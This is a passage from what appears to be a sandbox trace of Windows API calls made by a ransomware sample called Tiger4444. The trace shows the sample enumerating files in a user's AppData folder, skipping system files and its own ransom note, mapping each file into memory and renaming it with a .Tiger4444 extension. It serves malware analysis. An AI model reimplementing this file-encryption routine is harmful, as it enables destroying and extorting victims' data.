lpString2="bootmgr") returned -1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="pagefile.sys") returned -1 [0049.893] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="boot") returned -1 [0049.893] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="ids.txt") returned -1 [0049.893] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="NTUSER.DAT") returned -1 [0049.893] lstrcpyW (in: lpString1=0x30aeae8, lpString2="66w2QG9-.m4a" | out: lpString1="66w2QG9-.m4a") returned="66w2QG9-.m4a" [0049.893] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\66w2QG9-.m4a", dwFileAttributes=0x0) returned 1 [0049.893] lstrlenW (lpString="66w2QG9-.m4a") returned 12 [0049.893] lstrlenW (lpString="Tiger4444") returned 9 [0049.893] lstrcmpiW (lpString1="2QG9-.m4a", lpString2="Tiger4444") returned -1 [0049.893] lstrlenW (lpString=".dll") returned 4 [0049.893] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.893] lstrlenW (lpString=".lnk") returned 4 [0049.893] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.893] lstrlenW (lpString=".ini") returned 4 [0049.893] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.893] lstrlenW (lpString=".sys") returned 4 [0049.893] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\66w2QG9-.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\66w2qg9-.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.893] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.893] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14134634746) returned 1 [0049.893] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75754) returned 1 [0049.893] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0049.893] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0049.893] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12af0, lpName=0x0) returned 0x2c8 [0049.893] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12af0) returned 0xbe0000 [0049.914] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.914] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.915] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0049.915] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.915] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14136803607) returned 1 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0049.915] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0049.915] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.916] CloseHandle (hObject=0x2c8) returned 1 [0049.916] CloseHandle (hObject=0x260) returned 1 [0049.916] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\66w2QG9-.m4a.Tiger4444") returned 54 [0049.917] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\66w2QG9-.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\66w2qg9-.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\66w2QG9-.m4a.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\66w2qg9-.m4a.tiger4444"), dwFlags=0x1) returned 1 [0049.917] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="Tiger4444.exe") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0049.917] lstrcmpiW (lpString1="Adobe", lpString2="NTUSER.DAT") returned -1 [0049.917] lstrcpyW (in: lpString1=0x30aeae8, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0049.917] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664c0 [0049.917] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c) returned 0xc5e610 [0049.917] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664c8 | out: ListHead=0xc66828, ListEntry=0xc664c8) returned 0xc66548 [0049.917] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc96bf50, ftCreationTime.dwHighDateTime=0x1d4c6a0, ftLastAccessTime.dwLowDateTime=0x9975cba0, ftLastAccessTime.dwHighDateTime=0x1d4ce26, ftLastWriteTime.dwLowDateTime=0x9975cba0, ftLastWriteTime.dwHighDateTime=0x1d4ce26, nFileSizeHigh=0x0, nFileSizeLow=0x1258, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aHx3nVhQd.bmp", cAlternateFileName="AHX3NV~1.BMP")) returned 1 [0049.917] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="Tiger4444.exe") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2=".") returned 1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="..") returned 1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="windows") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="bootmgr") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="pagefile.sys") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="boot") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="ids.txt") returned -1 [0049.918] lstrcmpiW (lpString1="aHx3nVhQd.bmp", lpString2="NTUSER.DAT") returned -1 [0049.918] lstrcpyW (in: lpString1=0x30aeae8, lpString2="aHx3nVhQd.bmp" | out: lpString1="aHx3nVhQd.bmp") returned="aHx3nVhQd.bmp" [0049.918] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aHx3nVhQd.bmp", dwFileAttributes=0x0) returned 1 [0049.918] lstrlenW (lpString="aHx3nVhQd.bmp") returned 13 [0049.918] lstrlenW (lpString="Tiger4444") returned 9 [0049.918] lstrcmpiW (lpString1="nVhQd.bmp", lpString2="Tiger4444") returned -1 [0049.918] lstrlenW (lpString=".dll") returned 4 [0049.918] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0049.918] lstrlenW (lpString=".lnk") returned 4 [0049.918] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0049.918] lstrlenW (lpString=".ini") returned 4 [0049.918] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0049.918] lstrlenW (lpString=".sys") returned 4 [0049.918] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0049.918] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aHx3nVhQd.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ahx3nvhqd.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.918] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.918] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14137152891) returned 1 [0049.918] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=4696) returned 1 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0049.919] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1560, lpName=0x0) returned 0x2c8 [0049.919] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1560) returned 0xbe0000 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.919] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0049.919] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.920] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0049.920] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.920] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.920] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14137272961) returned 1 [0049.920] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0049.920] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0049.920] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.920] CloseHandle (hObject=0x2c8) returned 1 [0049.920] CloseHandle (hObject=0x260) returned 1 [0049.923] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aHx3nVhQd.bmp.Tiger4444") returned 55 [0049.923] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aHx3nVhQd.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ahx3nvhqd.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aHx3nVhQd.bmp.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ahx3nvhqd.bmp.tiger4444"), dwFlags=0x1) returned 1 [0049.923] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1634cb60, ftCreationTime.dwHighDateTime=0x1d4cdf4, ftLastAccessTime.dwLowDateTime=0xdbac6550, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0xdbac6550, ftLastWriteTime.dwHighDateTime=0x1d4cb8e, nFileSizeHigh=0x0, nFileSizeLow=0x12b96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aQTiHV46oGtw-kWYzdN.jpg", cAlternateFileName="AQTIHV~1.JPG")) returned 1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="Tiger4444.exe") returned -1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2=".") returned 1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="..") returned 1 [0049.923] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="windows") returned -1 [0049.924] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="bootmgr") returned -1 [0049.924] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="pagefile.sys") returned -1 [0049.924] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="boot") returned -1 [0049.924] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="ids.txt") returned -1 [0049.924] lstrcmpiW (lpString1="aQTiHV46oGtw-kWYzdN.jpg", lpString2="NTUSER.DAT") returned -1 [0049.924] lstrcpyW (in: lpString1=0x30aeae8, lpString2="aQTiHV46oGtw-kWYzdN.jpg" | out: lpString1="aQTiHV46oGtw-kWYzdN.jpg") returned="aQTiHV46oGtw-kWYzdN.jpg" [0049.924] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aQTiHV46oGtw-kWYzdN.jpg", dwFileAttributes=0x0) returned 1 [0049.924] lstrlenW (lpString="aQTiHV46oGtw-kWYzdN.jpg") returned 23 [0049.924] lstrlenW (lpString="Tiger4444") returned 9 [0049.924] lstrcmpiW (lpString1="WYzdN.jpg", lpString2="Tiger4444") returned 1 [0049.924] lstrlenW (lpString=".dll") returned 4 [0049.924] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.924] lstrlenW (lpString=".lnk") returned 4 [0049.924] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0049.924] lstrlenW (lpString=".ini") returned 4 [0049.924] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0049.924] lstrlenW (lpString=".sys") returned 4 [0049.924] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.924] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aQTiHV46oGtw-kWYzdN.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\aqtihv46ogtw-kwyzdn.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.924] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.924] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14137739157) returned 1 [0049.924] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76694) returned 1 [0049.924] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0049.924] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0049.924] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12ea0, lpName=0x0) returned 0x2c8 [0049.925] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12ea0) returned 0xbe0000 [0049.926] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.926] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0049.926] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.926] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0049.926] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.926] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0049.926] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.926] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0049.927] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14137963375) returned 1 [0049.927] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0049.927] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0049.927] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.927] CloseHandle (hObject=0x2c8) returned 1 [0049.927] CloseHandle (hObject=0x260) returned 1 [0049.930] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\aQTiHV46oGtw-kWYzdN.jpg.Tiger4444") returned 65 [0049.930] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aQTiHV46oGtw-kWYzdN.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\aqtihv46ogtw-kwyzdn.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\aQTiHV46oGtw-kWYzdN.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\aqtihv46ogtw-kwyzdn.jpg.tiger4444"), dwFlags=0x1) returned 1 [0049.966] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f411520, ftCreationTime.dwHighDateTime=0x1d4d081, ftLastAccessTime.dwLowDateTime=0xe02e65f0, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0xe02e65f0, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xccf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B1Y4Sf.mkv", cAlternateFileName="")) returned 1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="Tiger4444.exe") returned -1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2=".") returned 1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="..") returned 1 [0049.966] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="windows") returned -1 [0049.967] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="bootmgr") returned -1 [0049.967] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="pagefile.sys") returned -1 [0049.967] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="boot") returned -1 [0049.967] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="ids.txt") returned -1 [0049.967] lstrcmpiW (lpString1="B1Y4Sf.mkv", lpString2="NTUSER.DAT") returned -1 [0049.967] lstrcpyW (in: lpString1=0x30aeae8, lpString2="B1Y4Sf.mkv" | out: lpString1="B1Y4Sf.mkv") returned="B1Y4Sf.mkv" [0049.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B1Y4Sf.mkv", dwFileAttributes=0x0) returned 1 [0049.967] lstrlenW (lpString="B1Y4Sf.mkv") returned 10 [0049.967] lstrlenW (lpString="Tiger4444") returned 9 [0049.967] lstrcmpiW (lpString1="1Y4Sf.mkv", lpString2="Tiger4444") returned -1 [0049.967] lstrlenW (lpString=".dll") returned 4 [0049.967] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".lnk") returned 4 [0049.967] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0049.967] lstrlenW (lpString=".ini") returned 4 [0049.967] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0049.967] lstrlenW (lpString=".sys") returned 4 [0049.967] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0049.967] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B1Y4Sf.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b1y4sf.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.967] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.967] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14142047579) returned 1 [0049.967] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3279) returned 1 [0049.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0049.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0049.968] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfd0, lpName=0x0) returned 0x2c8 [0049.968] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd0) returned 0xbe0000 [0049.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0049.968] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0049.968] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14142147999) returned 1 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0049.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0049.968] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.969] CloseHandle (hObject=0x2c8) returned 1 [0049.969] CloseHandle (hObject=0x260) returned 1 [0049.969] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\B1Y4Sf.mkv.Tiger4444") returned 52 [0049.969] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B1Y4Sf.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b1y4sf.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B1Y4Sf.mkv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b1y4sf.mkv.tiger4444"), dwFlags=0x1) returned 1 [0049.970] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc0d2b30, ftCreationTime.dwHighDateTime=0x1d4d19c, ftLastAccessTime.dwLowDateTime=0x320499f0, ftLastAccessTime.dwHighDateTime=0x1d4d5bb, ftLastWriteTime.dwLowDateTime=0x320499f0, ftLastWriteTime.dwHighDateTime=0x1d4d5bb, nFileSizeHigh=0x0, nFileSizeLow=0x33e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CBpBim.docx", cAlternateFileName="CBPBIM~1.DOC")) returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="Tiger4444.exe") returned -1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2=".") returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="..") returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="windows") returned -1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="bootmgr") returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="pagefile.sys") returned -1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="boot") returned 1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="ids.txt") returned -1 [0049.970] lstrcmpiW (lpString1="CBpBim.docx", lpString2="NTUSER.DAT") returned -1 [0049.970] lstrcpyW (in: lpString1=0x30aeae8, lpString2="CBpBim.docx" | out: lpString1="CBpBim.docx") returned="CBpBim.docx" [0049.970] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CBpBim.docx", dwFileAttributes=0x0) returned 1 [0049.970] lstrlenW (lpString="CBpBim.docx") returned 11 [0049.970] lstrlenW (lpString="Tiger4444") returned 9 [0049.970] lstrcmpiW (lpString1="pBim.docx", lpString2="Tiger4444") returned -1 [0049.970] lstrlenW (lpString=".dll") returned 4 [0049.970] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0049.970] lstrlenW (lpString=".lnk") returned 4 [0049.970] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0049.970] lstrlenW (lpString=".ini") returned 4 [0049.970] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0049.970] lstrlenW (lpString=".sys") returned 4 [0049.970] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0049.970] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\CBpBim.docx" (normalized: 